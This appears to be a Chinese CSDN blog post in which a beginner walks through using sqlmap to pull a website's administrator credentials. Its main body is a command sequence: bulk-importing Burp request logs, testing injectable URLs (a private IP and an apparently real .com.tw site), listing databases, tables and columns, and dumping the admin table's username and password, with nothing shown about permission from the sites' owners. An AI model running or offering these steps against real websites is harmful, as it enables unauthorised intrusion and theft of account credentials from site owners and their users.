获取网站管理员账户密码?

  最近学长让用sqlmap获取一个网站的管理员账户和密码,一开始就很迷茫啊,毕竟对这些东西不是太了解,,可能是我懂得太少,,后来完成之后才发现是一件很简单的事,毕竟,学长给的是一个容易攻破的网站,,也不算是攻破,总之就是入门嘛。

  SQL注入:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

  首先sqlmap据说是一个开源的,很强大的,集检测和利用注入点于一身的工具,有python语言开发,用之前得装python环境。说是有检测功能但是并不能直接扫描网站找到注入点,但是可以批量导入,就是省了你的麻烦。但是说一体化好像牵强了一点。

  至于批量导入这里借用一个大佬的方法,就是借用burpsuite的日志文件批量导入,

    配置burpsuite下记录所有的request记录,并保存在指定文件夹,指定在sqlmap的目录下,然后python sqlmap.py -l 文件名 --batch -smart

  sqlmap就能批量导入burp的log文件了--batch指默认都选yes,,-smart指启发式快速判断,节约时间。

  最后能注入的url会保存到out文件夹下 

  注意:log文件中如果有sqlmap无法读取的字符(ascii码之外的字符)会读取失败。

  找注入点的工具还是啊d名小子啥的比较方便,而且这些工具才真是一体化,感觉比sqlmap简单的多。

  而手工找注入点,,,主要是根据返回值的不同,这里就不说了,有个工具多好(所以说有些人感觉很厉害,可能是人家工具到位,并不一定是技术很强,大佬,请自动忽略)

  既然找到注入点了,一般就不用测试了,但是还是列一下

 sqlmap -u "http://192.168.1.150/products.asp?id=134"  
因为我这是linux系统所以直接调用,windows:

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"

一般会扫描出数据库管理器的类型和操作系统啥的

接下来我就按linux来了。。

  列出数据库

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs

有时候可能会提示不成功,我学长给我的直接没有数据库,因为acc只有表,,,这就很尴尬,,


就是说没有数据库,试试只用--tables即列出表名

  

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11  --tables
  如果有数据库的话 加-D 数据库名

列表名有时候也不会成功,它会提示你是否用常规方法啥的,输y就对了,他用的方法好像是试错法,,具体你一试就知道了。

接着就是列字段,和列出指定字段了

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost -T admin --column
sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost -T admin -C username,password --dump
  导出后密码一般都不是明文,MD5啥的加密。。完事

   至于后来用御剑啥的扫描登陆啥的就简单了

  sqlmap命令补充:

   参数:

  --current-db列出当前使用数据库

  --current-user当前用户

  --user 列出所有用户

  --password列出密码


PS:批量导入大佬的原文https://www.cnblogs.com/qmfsun/p/5654192.html

©️2020 CSDN 皮肤主题: 编程工作室 设计师: CSDN官方博客 返回首页
实付0元
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值